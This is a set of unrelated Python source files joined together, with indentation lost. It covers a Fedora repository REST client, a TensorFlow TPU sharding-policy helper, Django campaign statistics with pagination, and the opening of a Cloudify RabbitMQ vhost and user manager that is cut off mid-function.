:param pid: pid of the object to retrieve
:rtype: :class:`requests.models.Response`
"""
# /objects/{pid}/objectXML
return self.get('objects/%(pid)s/objectXML' % {'pid': pid})
def getRelationships(self, pid, subject=None, predicate=None, format=None):
'''Get information about relationships on an object.
Wrapper function for
`Fedora REST API getRelationships <https://wiki.duraspace.org/display/FEDORA34/REST+API#RESTAPI-getRelationships>`_
:param pid: object pid
:param subject: subject (optional)
:param predicate: predicate (optional)
:param format: format
:rtype: :class:`requests.models.Response`
'''
http_args = {}
if subject is not None:
http_args['subject'] = subject
if predicate is not None:
http_args['predicate'] = predicate
if format is not None:
http_args['format'] = format
url = 'objects/%(pid)s/relationships' % {'pid': pid}
return self.get(url, params=http_args)
def ingest(self, text, logMessage=None):
"""Ingest a new object into Fedora. Returns the pid of the new object on success.
Return response should have a status of 201 Created on success, and
the content of the response will be the newly created pid.
Wrapper function for `Fedora REST API ingest <http://fedora-commons.org/confluence/display/FCR30/REST+API#RESTAPI-ingest>`_
:param text: full text content of the object to be ingested
:param logMessage: optional log message
:rtype: :class:`requests.models.Response`
"""
# NOTE: ingest method supports additional options for
# label/format/namespace/ownerId, etc - but we generally set
# those in the foxml that is passed in
http_args = {}
if logMessage:
http_args['logMessage'] = logMessage
headers = {'Content-Type': 'text/xml'}
url = 'objects/new'
# if text is unicode, it needs to be encoded so we can send the
# data as bytes; otherwise, we get ascii encode errors in httplib/ssl
if isinstance(text, six.text_type):
text = bytes(text.encode('utf-8'))
return self.post(url, data=text, params=http_args, headers=headers)
def modifyDatastream(self, pid, dsID, dsLabel=None, mimeType=None, logMessage=None, dsLocation=None,
altIDs=None, versionable=None, dsState=None, formatURI=None, checksumType=None,
checksum=None, content=None, force=False):
'''Modify an existing datastream, similar to :meth:`addDatastraem`.
Content can be specified by either a URI location or as
string content or file-like object; if content is not specified,
datastream metadata will be updated without modifying the content.
On success, the returned response should have a status code 200;
on failure, the response body may include an error message.
:param pid: object pid
:param dsID: id for the new datastream
:param dslabel: label for the new datastream (optional)
:param mimeType: mimetype for the new datastream (optional)
:param logMessage: log message for the object history (optional)
:param dsLocation: URL where the content should be ingested from (optional)
:param altIDs: alternate ids (optional)
:param versionable: configure datastream versioning (optional)
:param dsState: datastream state (optional)
:param formatURI: datastream format (optional)
:param checksumType: checksum type (optional)
:param checksum: checksum (optional)
:param content: datastream content, as a file-like object or
characterdata (optional)
:param force: force the update (default: False)
:rtype: :class:`requests.models.Response`
'''
# /objects/{pid}/datastreams/{dsID} ? [dsLocation] [altIDs] [dsLabel]
# [versionable] [dsState] [formatURI] [checksumType] [checksum]
# [mimeType] [logMessage] [force] [ignoreContent]
# NOTE: not implementing ignoreContent (unneeded)
# Unlike addDatastream, if checksum is sent without checksum
# type, Fedora honors it (*does* error on invalid checksum
# with no checksum type) - it seems to use the existing
# checksum type if a new type is not specified.
http_args = {}
if dsLabel:
http_args['dsLabel'] = dsLabel
if mimeType:
http_args['mimeType'] = mimeType
if logMessage:
http_args['logMessage'] = logMessage
if dsLocation:
http_args['dsLocation'] = dsLocation
if altIDs:
http_args['altIDs'] = altIDs
if versionable is not None:
http_args['versionable'] = versionable
if dsState:
http_args['dsState'] = dsState
if formatURI:
http_args['formatURI'] = formatURI
if checksumType:
http_args['checksumType'] = checksumType
if checksum:
http_args['checksum'] = checksum
if force:
http_args['force'] = force
content_args = {}
if content:
# content can be either a string or a file-like object
if hasattr(content, 'read'): # allow content to be a file
# warn about missing checksums for files
if not checksum:
logger.warning("Updating datastream %s/%s with a file, but no checksum passed",
pid, dsID)
# either way (string or file-like object), set content as request data
# (file-like objects supported in requests as of 0.13.1)
content_args['data'] = content
url = 'objects/%s/datastreams/%s' % (pid, dsID)
return self.put(url, params=http_args, **content_args)
def modifyObject(self, pid, label, ownerId, state, logMessage=None):
'''Modify object properties. Returned response should have
a status of 200 on succuss.
:param pid: object pid
:param label: object label
:param ownerId: object owner
:param state: object state
:param logMessage: optional log message
:rtype: :class:`requests.models.Response`
'''
# /objects/{pid} ? [label] [ownerId] [state] [logMessage]
http_args = {'label': label,
'ownerId': ownerId,
'state': state}
if logMessage is not None:
http_args['logMessage'] = logMessage
url = 'objects/%(pid)s' % {'pid': pid}
return self.put(url, params=http_args)
# return r.status_code == requests.codes.ok
def purgeDatastream(self, pid, dsID, startDT=None, endDT=None, logMessage=None,
force=False):
"""Purge a datastream, or specific versions of a dastream, from
a Fedora object. On success, response content will include
a list of timestamps for the purged datastream versions; on failure,
response content may contain an error message.
:param pid: object pid
:param dsID: datastream ID
:param startDT: optional start datetime (when purging specific versions)
:param endDT: optional end datetime (when purging specific versions)
:param logMessage: optional log message
:rtype: :class:`requests.models.Response`
"""
# /objects/{pid}/datastreams/{dsID} ? [startDT] [endDT] [logMessage] [force]
http_args = {}
if logMessage:
http_args['logMessage'] = logMessage
if startDT:
http_args['startDT'] = startDT
if endDT:
http_args['endDT'] = endDT
if force:
http_args['force'] = force
url = 'objects/%(pid)s/datastreams/%(dsid)s' % {'pid': pid, 'dsid': dsID}
return self.delete(url, params=http_args)
# as of Fedora 3.4, returns 200 on success with a list of the
# timestamps for the versions deleted as response content
# NOTE: response content may be useful on error, e.g.
# no path in db registry for [bogus:pid]
# is there any useful way to pass this info back?
# *NOTE*: bug when purging non-existent datastream on a valid pid
# - reported here: http://www.fedora-commons.org/jira/browse/FCREPO-690
# - as a possible work-around, could return false when status = 200
# but response body is an empty list (i.e., no datastreams/versions purged)
# NOTE: previously returned this
# return r.status_code == 200, response.read()
def purgeObject(self, pid, logMessage=None):
"""Purge an object from Fedora.
Returned response shoudl have a status of 200 on success; response
content is a timestamp.
Wrapper function for
`REST API purgeObject <http://fedora-commons.org/confluence/display/FCR30/REST+API#RESTAPI-purgeObject>`_
:param pid: pid of the object to be purged
:param logMessage: optional log message
:rtype: :class:`requests.models.Response`
"""
http_args = {}
if logMessage:
http_args['logMessage'] = logMessage
url = 'objects/%(pid)s' % {'pid': pid}
return self.delete(url, params=http_args)
# as of Fedora 3.4, returns 200 on success; response content is timestamp
# return response.status == requests.codes.ok, response.content
def purgeRelationship(self, pid, subject, predicate, object, isLiteral=False,
datatype=None):
'''Remove a relationship from an object.
Wrapper function for
`Fedora REST API purgeRelationship <https://wiki.duraspace.org/display/FEDORA34/REST+API#RESTAPI-purgeRelationship>`_
:param pid: object pid
:param subject: relationship subject
:param predicate: relationship predicate
:param object: relationship object
:param isLiteral: boolean (default: false)
:param datatype: optional datatype
:returns: boolean; indicates whether or not a relationship was
removed
'''
http_args = {'subject': subject, 'predicate': predicate,
'object': object, 'isLiteral': isLiteral}
if datatype is not None:
http_args['datatype'] = datatype
url = 'objects/%(pid)s/relationships' % {'pid': pid}
response = self.delete(url, params=http_args)
# should have a status code of 200;
# response body text indicates if a relationship was purged or not
return response.status_code == requests.codes.ok and response.content == b'true'
def setDatastreamState(self, pid, dsID, dsState):
'''Update datastream state.
:param pid: object pid
:param dsID: datastream id
:param dsState: datastream state
:returns: boolean success
'''
# /objects/{pid}/datastreams/{dsID} ? [dsState]
http_args = {'dsState' : dsState}
url = 'objects/%(pid)s/datastreams/%(dsid)s' % {'pid': pid, 'dsid': dsID}
response = self.put(url, params=http_args)
# returns response code 200 on success
return response.status_code == requests.codes.ok
def setDatastreamVersionable(self, pid, dsID, versionable):
'''Update datastream versionable setting.
:param pid: object pid
:param dsID: datastream id
:param versionable: boolean
:returns: boolean success
'''
# /objects/{pid}/datastreams/{dsID} ? [versionable]
http_args = {'versionable': versionable}
url = 'objects/%(pid)s/datastreams/%(dsid)s' % {'pid': pid, 'dsid': dsID}
response = self.put(url, params=http_args)
# returns response code 200 on success
return response.status_code == requests.codes.ok
## utility methods
def upload(self, data, callback=None, content_type=None,
size=None):
'''
Upload a multi-part file for content to ingest. Returns a
temporary upload id that can be used as a datstream location.
:param data: content string, file-like object, or iterable with
content to be uploaded
:param callback: optional callback method to monitor the upload;
see :mod:`requests-toolbelt` documentation for more
details: https://toolbelt.readthedocs.org/en/latest/user.html#uploading-data
:param content_type: optional content type of the data
:param size: optional size of the data; required when using an
iterable for the data
:returns: upload id on success
'''
url = 'upload'
# fedora only expects content uploaded as multipart file;
# make string content into a file-like object so requests.post
# sends it the way Fedora expects.
# NOTE: checking for both python 2.x next method and
# python 3.x __next__ to test if data is iteraable
if not hasattr(data, 'read') and \
not (hasattr(data, '__next__') or hasattr(data, 'next')):
data = six.BytesIO(force_bytes(data))
# if data is an iterable, wrap in a readable iterator that
# requests-toolbelt can read data from
elif not hasattr(data, 'read') and \
(hasattr(data, '__next__') or hasattr(data, 'next')):
if size is None:
raise Exception('Cannot upload iterable with unknown size')
data = ReadableIterator(data, size)
# use requests-toolbelt multipart encoder to avoid reading
# the full content of large files into memory
menc = MultipartEncoder(fields={'file': ('file', data, content_type)})
if callback is not None:
menc = MultipartEncoderMonitor(menc, callback)
headers = {'Content-Type': menc.content_type}
if size:
# latest version of requests requires str or bytes, not int
if not isinstance(size, six.string_types):
size = str(size)
headers['Content-Length'] = size
try:
response = self.post(url, data=menc, headers=headers)
except OverflowError:
# Python __len__ uses integer so it is limited to system maxint,
# and requests and requests-toolbelt use len() throughout.
# This results in an overflow error when trying to upload a file
# larger than system maxint (2GB on 32-bit OSes).
# See http://bugs.python.org/issue12159
msg = 'upload content larger than system maxint (32-bit OS limitation)'
logger.error('OverflowError: %s', msg)
raise OverflowError(msg)
if response.status_code == requests.codes.accepted:
return response.text.strip()
# returns 202 Accepted on success
# content of response should be upload id, if successful
# NOTE: the "LITE" APIs are planned to be phased out; when that happens, these functions
# (or their equivalents) should be available in the REST API
class API_A_LITE(HTTP_API_Base):
"""
Python object for accessing `Fedora's API-A-LITE <http://fedora-commons.org/confluence/display/FCR30/API-A-LITE>`_.
.. NOTE::
As of Fedora 3.4, the previous "LITE" APIs are deprecated;
this APIis maintained because the REST API covers all functionality
except describeRepository.
"""
def describeRepository(self):
"""Get information about a Fedora repository.
:rtype: :class:`requests.models.Response`
"""
http_args = {'xml': 'true'}
return self.get('describe', params=http_args)
class ApiFacade(REST_API, API_A_LITE):
"""Provide access to both :class:`REST_API` and :class:`API_A_LITE`."""
# as of 3.4, REST API covers everything except describeRepository
def __init__(self, base_url, username=None, password=None):
HTTP_API_Base.__init__(self, base_url, username, password)
class UnrecognizedQueryLanguage(EnvironmentError):
pass
class ResourceIndex(HTTP_API_Base):
"Python object for accessing Fedora's Resource Index."
RISEARCH_FLUSH_ON_QUERY = False
"""Specify whether or not RI search queries should specify flush=true to obtain
the most recent results. If flush is specified to the query method, that
takes precedence.
Irrelevant if Fedora RIsearch is configured with syncUpdates = True.
"""
def find_statements(self, query, language='spo', type='triples', flush=None,
limit=None):
"""
Run a query in a format supported by the Fedora Resource Index (e.g., SPO
or Sparql) and return the results.
:param query: query as a string
:param language: query language to use; defaults to 'spo'
:param type: type of query - tuples or triples; defaults to 'triples'
:param flush: flush results to get recent changes; defaults to False
:rtype: :class:`rdflib.ConjunctiveGraph` when type is ``triples``; list
of dictionaries (keys based on return fields) when type is ``tuples``
"""
http_args = {
'type': type,
'lang': language,
'query': query,
}
if type == 'triples':
result_format = 'N-Triples'
elif type == 'tuples':
result_format = 'CSV'
if limit is not None:
http_args['limit'] = limit
# else - error/exception ?
http_args['format'] = result_format
return self._query(result_format, http_args, flush)
def count_statements(self, query, language='spo', type='triples',
flush=None):
"""
Run a query in a format supported by the Fedora Resource Index
(e.g., SPO or Sparql) and return the count of the results.
:param query: query as a string
:param language: query language to use; defaults to 'spo'
:param flush: flush results to get recent changes; defaults to False
:rtype: integer
"""
result_format = 'count'
http_args = {
'type': type,
'lang': language,
'query': query,
'format': result_format
}
return self._query(result_format, http_args, flush)
def _query(self, format, http_args, flush=None):
# if flush parameter was not specified, use class setting
if flush is None:
flush = self.RISEARCH_FLUSH_ON_QUERY
http_args['flush'] = 'true' if flush else 'false'
# log the actual query so it's easier to see what's happening
logger.debug('risearch query type=%(type)s language=%(lang)s format=%(format)s flush=%(flush)s\n%(query)s',
http_args)
url = 'risearch'
try:
start = time.time()
response = self.get(url, params=http_args)
data, abs_url = response.content, response.url
total_time = time.time() - start
# parse the result according to requested format
if api_called is not None:
api_called.send(sender=self.__class__, time_taken=total_time,
method='risearch', url='', response=response,
args=[], kwargs={'format': format,
'http_args': http_args,
'flush': flush})
if format == 'N-Triples':
return parse_rdf(data, abs_url, format='n3')
elif format == 'CSV':
# reader expects a file or a list; for now, just split the string
# TODO: when we can return url contents as file-like objects, use that
return csv.DictReader(response.text.split('\n'))
elif format == 'count':
return int(data)
# should we return the response as fallback?
except RequestFailed as err:
if 'Unrecognized query language' in err.detail:
raise UnrecognizedQueryLanguage(err.detail)
# could also see 'Unsupported output format'
else:
raise err
def spo_search(self, subject=None, predicate=None, object=None):
"""
Create and run a subject-predicate-object (SPO) search. Any search terms
that are not specified will be replaced as a wildcard in the query.
:param subject: optional subject to search
:param predicate: optional predicate to search
:param object: optional object to search
:rtype: :class:`rdflib.ConjunctiveGraph`
"""
spo_query = '%s %s %s' % \
(self.spoencode(subject), self.spoencode(predicate), self.spoencode(object))
return self.find_statements(spo_query)
def spoencode(self, val):
"""
Encode search terms for an SPO query.
:param val: string to be encoded
:rtype: string
"""
if val is None:
return '*'
elif "'" in val: # FIXME: need better handling for literal strings
return val
else:
return '<%s>' % (val,)
def get_subjects(self, predicate, object):
"""
Search for all subjects related to the specified predicate and object.
:param predicate:
:param object:
:rtype: generator of RDF statements
"""
for statement in self.spo_search(predicate=predicate, object=object):
yield str(statement[0])
def get_predicates(self, subject, object):
"""
Search for all subjects related to the specified subject and object.
:param subject:
:param object:
:rtype: generator of RDF statements
"""
for statement in self.spo_search(subject=subject, object=object):
yield str(statement[1])
def get_objects(self, subject, predicate):
"""
Search for all subjects related to the specified subject and predicate.
:param subject:
:param object:
:rtype: generator of RDF statements
"""
for statement in self.spo_search(subject=subject, predicate=predicate):
yield str(statement[2])
def sparql_query(self, query, flush=None, limit=None):
"""
Run a Sparql query.
:param query: sparql query string
:rtype: list of dictionary
"""
return self.find_statements(query, language='sparql', type='tuples',
flush=flush, limit=limit)
def sparql_count(self, query, flush=None):
"""
Count results for a Sparql query.
:param query: sparql query string
:rtype: int
"""
return self.count_statements(query, language='sparql', type='tuples',
flush=flush)
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Helper library for sharding during TPU compilation."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import tensor_shape
_DEFAULT_NUMBER_OF_SHARDS = 1
_DEFAULT_SHARD_DIMENSION = 0
# TODO(b/36777903) change other parts of tpu.py to use this class.
class ShardingPolicy(object):
"""An object use to hold the sharding policy for a Tensor.
"""
def __init__(self):
self._number_of_shards = None
self._shard_dimension = None
self._frozen = False
def __str__(self):
if self.number_of_shards is None or self.shard_dimension is None:
return "ShardingPolicy(unset)"
else:
return ("ShardingPolicy(%d shards dimension %d)" %
(self.number_of_shards, self.shard_dimension))
def _fill_default_values(self):
if self._number_of_shards is None:
self._number_of_shards = _DEFAULT_NUMBER_OF_SHARDS
if self._shard_dimension is None:
self._shard_dimension = tensor_shape.as_dimension(
_DEFAULT_SHARD_DIMENSION)
def freeze(self):
"""Prevents further modification to the sharding policy.
Any values that have not been set when freeze is called are set to
defaults. If the ShardingPolicy is already frozen, this is a NoOp.
"""
if not self._frozen:
self._fill_default_values()
self._frozen = True
@property
def number_of_shards(self):
"""Returns the number of shards in the policy or None if unspecified."""
return self._number_of_shards
def set_number_of_shards(self, number_of_shards):
"""Sets the number of shards for the current policy.
If the policy has been frozen then number_of_shards must match the
existing setting.
Args:
number_of_shards: The number of shards to use in the policy.
Raises:
ValueError: If the policy has been frozen and number_of_shards
differs from the frozen value; or number_of_shards <= 0.
"""
if self._frozen:
if self._number_of_shards != number_of_shards:
raise ValueError(
"Can't set sharding policy to use %d shards since it has been "
"frozen to use %d." % (number_of_shards, self._number_of_shards))
else:
if number_of_shards > 0:
self._number_of_shards = number_of_shards
else:
raise ValueError(
"Can't set sharding policy to use %s shards; value must be >0" %
str(number_of_shards))
@property
def shard_dimension(self):
"""Returns the shard dimension of the policy or None if unspecified."""
return self._shard_dimension
def set_shard_dimension(self, shard_dimension):
"""Sets the shard dimension for the current policy.
If the policy has been frozen then shard_dimension must match the
existing setting.
Args:
shard_dimension: The shard dimension to use in the policy.
Raises:
ValueError: If the policy has been frozen and shard_dimension
differs from the frozen value, or shard_dimension can't be
interpreted as a Dimension.
"""
if self._frozen:
if self._shard_dimension != shard_dimension:
raise ValueError(
"Can't set shard dimension to %d since it has been frozen to "
"use %d." % (shard_dimension, self._shard_dimension))
else:
self._shard_dimension = tensor_shape.as_dimension(shard_dimension)
def merge(self, other):
"""Merges the policy of another policy into the current policy.
Args:
other: The policy to merge into this one.
Raises:
ValueError: If this policy has been frozen and the merge conflicts with
the frozen policy.
"""
if other.number_of_shards is not None:
self.set_number_of_shards(other.number_of_shards)
if other.shard_dimension is not None:
self.set_shard_dimension(other.shard_dimension)
def get_sharded_shape(self, shape, shard_index=None):
"""Returns the shape of a shard of a full Tensor.
When given the shape of a 'full-size' Tensor, returns the shape of
the sub-Tensor after it has been sharded. Freezes the policy if it
has not yet been frozen.
Args:
shape: The shape of the full-size Tensor to be sharded.
shard_index: The index of the shard whose shape should be returned.
shard_index can be None for sharding policies that use the same
shape for every shard.
Returns:
The shape of the sharded version of the Tensor.
Raises:
ValueError: If shard_index is None when shards are of different
shapes; or shard_index is not None and
!(0<=shard_index<number_of_shards); or shape does not have at
least self.shard_dimension+1 dimensions; or the value of
shape's shard dimension is not a multiple of
self.number_of_shards
"""
if self._shard_dimension is None or self._number_of_shards is None:
# Don't raise an error if the config is unset.
return None
if shard_index is not None:
if shard_index < 0 or shard_index >= self.number_of_shards:
raise ValueError("shard_index %d, but must be in [0,%d)." %
(shard_index, self._number_of_shards))
shape = tensor_shape.as_shape(shape)
if self._number_of_shards == 1:
# Don't do anything when there's only one shard.
return shape
ndims = shape.ndims
if ndims is None:
raise ValueError("shape must be a specified shape not Unknown")
if ndims <= self._shard_dimension:
raise ValueError("shape %s does not contain shard_dimension %d" %
(shape.as_list(), self._shard_dimension))
dims = shape.as_list()
if dims[self._shard_dimension] is None:
raise ValueError("shape %s must have a fixed size for dimension %d "
"that is known at graph construction time." %
(shape.as_list(), self._shard_dimension))
if (dims[self._shard_dimension] % self._number_of_shards) != 0:
raise ValueError("shape %s cannot be sharded %d ways along dimension %d" %
(shape.as_list(), self._number_of_shards,
self._shard_dimension))
dims[self._shard_dimension] //= self._number_of_shards
return tensor_shape.as_shape(dims)
def _unshard_shape(self, shape):
"""Return the unsharded shape that would generate a given sharded shape.
Args:
shape: the sharded shape to unshard
Returns:
The unsharded shape.
Raises:
ValueError: if shape is unknown or does not contain
self.shard_dimension
TypeError: if shape is not convertible to a TensorShape
"""
shape = tensor_shape.as_shape(shape)
if self._number_of_shards == 1:
# Don't do anything when there's only one shard.
return shape
ndims = shape.ndims
if ndims is None:
raise ValueError("shape must be a specified shape not Unknown")
if ndims <= self._shard_dimension:
raise ValueError("shape %s does not contain shard_dimension %d" %
(shape.as_list(), self._shard_dimension))
dims = shape.as_list()
dims[self._shard_dimension] *= self._number_of_shards
return tensor_shape.as_shape(dims)
def get_unsharded_shape(self, shapes):
"""Returns the shape of an unsharded Tensor given a list of shards.
When given a list of shapes of shards, returns the shape of the
unsharded Tensor that would generate the shards. Sets defaults for the
policy if number_of_shards or shard_dimension is None.
Args:
shapes: The shapes of the Tensor shards to be combined.
Returns:
The shape of the unsharded version of the Tensor.
Raises:
ValueError: if shapes is not a list of length
self.number_of_shards; or any element of shapes is not a valid
shape consistent with the sharding policy; or the list of
shapes is not a valid sharding of a full shape.
TypeError: if an element of shapes is not convertible to a
TensorShape
"""
self._fill_default_values()
if len(shapes) != self.number_of_shards:
raise ValueError(
"shapes is %s but must be a list of length number_of_shards=%d" % (
str(shapes), self.number_of_shards))
unsharded_shapes = [self._unshard_shape(s) for s in shapes]
for i in xrange(self.number_of_shards - 1):
if not unsharded_shapes[i].is_compatible_with(
unsharded_shapes[self.number_of_shards - 1]):
raise ValueError(
"sharded shapes %s are not consistent shards of a full shape "
"sharded %d ways along dimension %d" % (
str(shapes), self.number_of_shards, self.shard_dimension))
return unsharded_shapes[0]
| |
from itertools import groupby
from restapi.serializers import UserSerializer, CampaignSerializer, TaskSerializer
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from rest_framework.test import APIRequestFactory
from tasks import models
# TODO
def page_link(page):
return page.number
def next_page_or_none(page):
if not page.has_next():
return None
return page_link(page.next_page_number())
def previous_page_or_none(page):
if not page.has_previous():
return None
return page_link(page.previous_page_number())
def mean(nums):
return float(sum(nums)) / len(nums)
def stats_per_user_single_period(form):
entries = models.Entry.objects.all()
# TODO determine period
campaign = form.parse_campaign()
tasks = [ct.task for ct in campaign.campaigntask_set.all()]
entries_per_user = {k: list(v) for k, v in groupby(entries, lambda x: x.user)}
# TODO is there a better way?
context = {
'request': APIRequestFactory().get('/')
}
def create_stats(user, entries):
tasks_by_user = set([x.task for x in entries])
stats = [[0, 1][task in tasks_by_user] for task in tasks]
serialized_user = UserSerializer(user, context=context).data
return {
'user': serialized_user,
'score': mean(stats),
'stats': stats
}
rows = [create_stats(user, entries) for user, entries in entries_per_user.items()]
rows.sort(key=lambda stat: stat['score'], reverse=True)
# Note: another way to paginate is using Link headers like GitHub API:
# https://developer.github.com/v3/#pagination
paginator = Paginator(rows, 20) # TODO add pagesize param to form
pagenum = 1 # TODO add page param to form
try:
page = paginator.page(pagenum)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
page = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999),
# deliver last page of results.
page = paginator.page(paginator.num_pages)
columns = [TaskSerializer(task, context=context).data for task in tasks]
return {
'campaign': CampaignSerializer(campaign, context=context).data,
'rows': rows,
'columns': columns,
'page': {
'count': paginator.count,
'next': next_page_or_none(page),
'prev': previous_page_or_none(page),
'first': page_link(paginator.page(1)),
'last': page_link(paginator.page(paginator.num_pages)),
},
}
def calculate_period(campaign, entry):
return 1 + (entry.created_at.date() - campaign.start).days // campaign.period_days
def calculate_periods(campaign, entries):
# TODO periods should be complete set from campaign start to last entry
return [3, 2, 1]
def stats_per_user_multi_period(form):
entries = models.Entry.objects.all()
campaign = form.parse_campaign()
tasks = [ct.task for ct in campaign.campaigntask_set.all()]
for entry in entries:
entry.period = calculate_period(campaign, entry)
periods = calculate_periods(campaign, entries)
entries_per_user = {k: list(v) for k, v in groupby(sorted(entries, key=lambda x: x.user.pk), lambda x: x.user)}
# TODO is there a better way?
context = {
'request': APIRequestFactory().get('/')
}
def create_stats(user, entries):
tasks_per_period = {k: len(list(v)) / len(tasks) for k, v in groupby(entries, lambda x: x.period)}
def score(period):
if period in tasks_per_period:
return tasks_per_period[period]
return 0
stats = [score(period) for period in periods]
serialized_user = UserSerializer(user, context=context).data
return {
'user': serialized_user,
'score': mean(stats),
'stats': stats
}
rows = [create_stats(user, entries) for user, entries in entries_per_user.items()]
rows.sort(key=lambda stat: stat['score'], reverse=True)
# Note: another way to paginate is using Link headers like GitHub API:
# https://developer.github.com/v3/#pagination
paginator = Paginator(rows, 20) # TODO add pagesize param to form
pagenum = 1 # TODO add page param to form
try:
page = paginator.page(pagenum)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
page = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999),
# deliver last page of results.
page = paginator.page(paginator.num_pages)
columns = periods
return {
'campaign': CampaignSerializer(campaign, context=context).data,
'rows': rows,
'columns': columns,
'page': {
'count': paginator.count,
'next': next_page_or_none(page),
'prev': previous_page_or_none(page),
'first': page_link(paginator.page(1)),
'last': page_link(paginator.page(paginator.num_pages)),
},
}
def stats_per_group_single_period(form):
campaign = form.parse_campaign()
tasks = [ct.task for ct in campaign.campaigntask_set.all()]
# TODO should get from params
period = 1
entries = []
for entry in models.Entry.objects.all():
entry.period = calculate_period(campaign, entry)
if entry.period == period:
entries.append(entry)
entries_per_group = {k: list(v) for k, v in groupby(sorted(entries, key=lambda x: x.user.groups.first().pk), lambda x: x.user.groups.first())}
# TODO is there a better way?
context = {
'request': APIRequestFactory().get('/')
}
def create_stats(group, entries):
# TODO should be all users in group, not just in the completed entries
users_count = len(set([entry.user for entry in entries]))
count_per_task = {k: len(list(v)) for k, v in groupby(sorted(entries, key=lambda x: x.task.pk), lambda x: x.task)}
stats = []
for task in tasks:
if task in count_per_task:
score = count_per_task[task] / users_count
else:
score = 0
stats.append(score)
# TODO create and use GroupSerializer
serialized_group = group.name
return {
'group': serialized_group,
'score': mean(stats),
'stats': stats
}
rows = [create_stats(group, entries) for group, entries in entries_per_group.items()]
rows.sort(key=lambda stat: stat['score'], reverse=True)
# Note: another way to paginate is using Link headers like GitHub API:
# https://developer.github.com/v3/#pagination
paginator = Paginator(rows, 20) # TODO add pagesize param to form
pagenum = 1 # TODO add page param to form
try:
page = paginator.page(pagenum)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
page = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999),
# deliver last page of results.
page = paginator.page(paginator.num_pages)
columns = [TaskSerializer(task, context=context).data for task in tasks]
return {
'campaign': CampaignSerializer(campaign, context=context).data,
'rows': rows,
'columns': columns,
'page': {
'count': paginator.count,
'next': next_page_or_none(page),
'prev': previous_page_or_none(page),
'first': page_link(paginator.page(1)),
'last': page_link(paginator.page(paginator.num_pages)),
},
}
| |
########
# Copyright (c) 2013 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
from requests.exceptions import HTTPError
from functools import wraps
from cloudify.models_states import AgentState
from cloudify.utils import generate_user_password
from cloudify.cryptography_utils import encrypt, decrypt
from cloudify.rabbitmq_client import RabbitMQClient, USERNAME_PATTERN
from manager_rest.storage import get_storage_manager
from manager_rest.storage.models import Tenant, Agent
def ignore_not_found(func):
""" Helper decorator to ignore not found errors """
@wraps(func)
def wrapper(*args, **kwargs):
try:
func(*args, **kwargs)
except HTTPError as e:
if e.response.status_code == 404:
pass
else:
raise
return wrapper
RABBITMQ_MANAGEMENT_PORT = 15671
class AMQPManager(object):
VHOST_NAME_PATTERN = 'rabbitmq_vhost_{0}'
def __init__(self, host, username, password, **request_kwargs):
self._client = RabbitMQClient(host, username, password,
**request_kwargs)
self._storage_manager = get_storage_manager()
def create_tenant_vhost_and_user(self, tenant):
"""
Create a new RabbitMQ vhost and user, and grant the user permissions
on the vhost
:param tenant: An SQLAlchemy Tenant object
:return: The updated tenant object
"""
username, encrypted_password = self._create_rabbitmq_user(tenant)
vhost = tenant.rabbitmq_vhost or \
self.VHOST_NAME_PATTERN.format(tenant.name)
self._client.create_vhost(vhost)
self._client.set_vhost_permissions(vhost, username, '.*', '.*', '.*')
# Gives configure and write permissions to the specific exchanges of
# events, logs and monitoring. The exchange cloudify-events-topic
# is the new events exchange and cloudify-events permissions are being
# kept for old agents upgrades.
allowed_resources = '^cloudify-(events-topic|events|logs|monitoring)$'
self._client.set_vhost_permissions('/',
username,
configure=allowed_resources,
write=allowed_resources)
tenant.rabbitmq_vhost = vhost
tenant.rabbitmq_username = username
tenant.rabbitmq_password = encrypted_password
return tenant
def create_agent_user(self, agent):
"""
Create a new RabbitMQ user, and grant the user permissions
:param agent: An SQLAlchemy Agent object
:return: The updated agent object
"""
username, encrypted_password = self._create_rabbitmq_user(agent)
self._set_agent_rabbitmq_user_permissions(username,
agent.rabbitmq_exchange,
agent.tenant.rabbitmq_vhost)
agent.rabbitmq_username = username
agent.rabbitmq_password = encrypted_password
return agent
def sync_metadata(self):
"""Synchronize database tenants with rabbitmq metadata"""
tenants = self._storage_manager.list(Tenant, get_all_results=True)
agents = self._storage_manager.list(Agent, get_all_results=True)
self._clear_extra_vhosts(tenants)
self._clear_extra_users(tenants, agents)
self._add_missing_vhosts_and_users(tenants, agents)
def _create_rabbitmq_user(self, resource):
username = resource.rabbitmq_username or \
USERNAME_PATTERN.format(resource.name)
# The password is being stored encrypted in the DB
new_password = generate_user_password()
password = decrypt(resource.rabbitmq_password) \
if resource.rabbitmq_password else new_password
encrypted_password = resource.rabbitmq_password or \
encrypt(new_password)
self._client.create_user(username, password)
return username, encrypted_password
def _add_missing_vhosts_and_users(self, tenants, agents):
"""Create vhosts and users present in the database"""
for tenant in tenants:
updated_tenant = self.create_tenant_vhost_and_user(tenant)
self._storage_manager.update(updated_tenant)
for agent in agents:
if agent.state != AgentState.RESTORED:
updated_agent = self.create_agent_user(agent)
self._storage_manager.update(updated_agent)
def _clear_extra_vhosts(self, tenants):
"""Remove vhosts in rabbitmq not present in the database"""
expected_vhosts = set(
tenant.rabbitmq_vhost
for tenant in tenants
if tenant.rabbitmq_vhost # Ignore None values
)
current_vhosts = set(
vhost
for vhost in self._client.get_vhost_names()
